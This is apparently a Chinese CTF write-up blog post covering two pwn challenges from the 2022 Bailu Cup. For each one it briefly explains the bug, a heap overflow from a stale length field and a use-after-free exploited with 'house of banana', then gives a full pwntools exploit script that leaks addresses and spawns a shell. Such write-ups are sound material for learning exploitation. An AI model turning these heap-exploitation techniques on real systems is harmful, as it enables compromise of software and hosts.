Leof's blog
0%

2022柏鹭杯-pwn

发表于 更新于 分类于

2022柏鹭杯pwn题

pwn1

更新name的时候并没有将原先控制堆块对应的length字段更新。先申请大堆块,更新第一次把他释放掉并申请小堆块,再次更新name就能堆溢出了。堆溢出改掉func直接getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
from pwn import *
binary = "./note1"
elf = ELF(binary)
libc = elf.libc
ip = '1.14.71.254'
port = 28834
local = 1
if local:
    io = process(binary)
else:
    io = remote(ip, port)

#context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800

def menu(n):
    sla(b'> ', str(n))


def add(idx, size, func = 2, tag = b' ', name = b'a'):
    menu(1)
    sla(b': ', str(idx))
    sla(b': ', str(size))
    sla(b': ', name)
    sla(b': ', tag)
    sla(b': ', str(func))

def edit_name(idx, size, con = b'b'):
    menu(2)
    sla(b'id: ', str(idx))
    sla(b'> ', str(1))
    sla(b': ', str(size))
    sla(b': ', con)

def edit_tag(idx, tag):
    menu(2)
    sla(b'id: ', str(idx))
    sla(b'> ', str(2))
    sa(b': ', tag)

def edit_func(idx, func):
    menu(2)
    sla(b'id: ', str(idx))
    sla(b'> ', str(3))
    sla(b': ', str(func))

def call(idx):
    menu(3)
    sla(b': ', str(idx))



add(0, 0x420, tag = b' ', name = b'a' * 0x420)

edit_tag(0, p64(0xdeadbeefdeadbeef))
edit_func(0, 1)
call(0)
ru(b'\xef\xbe\xad\xde\xef\xbe\xad\xde')
base = u64(io.recv(6).ljust(8, b'\x00')) - 0x131B
lg('base') 

edit_name(0, 0x10)

add(1, 0x10, tag = b' ', name = b'a')

edit_name(0, 0x41f, p64(0) * 3 + p64(0x31) + p64(0) + p64(base + 0x131b) + p64(base + elf.got['puts']) + p64(0x421))

call(1)
libcbase = uu64() - libc.sym['puts']
lg('libcbase')
sys_addr = libcbase + libc.sym['system']
sh = libcbase + libc.search(b'/bin/sh').__next__()

edit_name(0, 0x41f, p64(0) * 3 + p64(0x31) + b'/bin/sh\x00' + p64(sys_addr))
call(1)
ia()

pwn2

uaf打house of banana

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
from pwn import *
binary = "./note2"
elf = ELF(binary)
libc = elf.libc
ip = '39.101.77.163'
port = 12032
local = 0
if local:
    io = process(binary)
else:
    io = remote(ip, port)

context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800

def menu(n):
    sla(b'> ', str(n))

def add(idx, size, con = b'a'):
    menu(1)
    sla(b'> ', str(idx))
    sla(b'> ', str(size))
    sla(b': ', con)

def delete(idx):
    menu(2)
    sla(b'> ', str(idx))

def show(idx):
    menu(3)
    sla(b'> ', str(idx))

for i in range(10):
    add(i, 0xf8)


for i in range(7):
    delete(i)
show(0)
key = u64(io.recv(5).ljust(8, b'\x00'))
heapbase = key << 12
lg('key')
lg('heapbase')



delete(8)
show(8)

libcbase = uu64() - 0x219ce0
environ = libcbase + 0x221200
sys_addr = libcbase + 0x50d60
sh = libcbase + libc.search(b'/bin/sh').__next__()
set_context = libcbase + libc.sym['setcontext'] + 61
l_next = libcbase + 0x265890
rtld = libcbase + 0x264040
ret = libcbase + 0x29cd6
pop_rdi = libcbase + 0x2a3e5
lg('libcbase')

delete(7)
add(6, 0x1f0)

add(0, 0xf0)

delete(8)
delete(7)

add(0, 0x1f0, b'a' * 0xf0 + p64(0) + p64(0x101) + p64((rtld)  ^ key))

add(0, 0xf0)
add(0, 0xf0, p64(heapbase + 0xcb0) + b'\x04' + b'\x00' * 7)


fake_rtld_global_addr = heapbase + 0xcb0
fake_rtld_global = p64(0) + p64(l_next) + p64(0) + p64(fake_rtld_global_addr)
fake_rtld_global += p64(set_context) + p64(ret)
fake_rtld_global += p64(sh)
fake_rtld_global += p64(ret)
fake_rtld_global += p64(sys_addr)
fake_rtld_global += b'\x00' * 0x80
fake_rtld_global += p64(fake_rtld_global_addr + 0x28 + 0x18)
fake_rtld_global += p64(pop_rdi)
fake_rtld_global += b'\x00' * (0x100 - len(fake_rtld_global))
fake_rtld_global += p64(fake_rtld_global_addr + 0x10 + 0x110) * 3
fake_rtld_global += p64(0x10)


add(0, 0x18, b'a' * 0x10 + p64(fake_rtld_global_addr + 0x20))
add(1, 0x200, fake_rtld_global)


payload = b'\x00' * 0xfc
payload += p8(0x8) + b'\x00' * 3
add(2, 0x200, payload)
menu(4)
ia()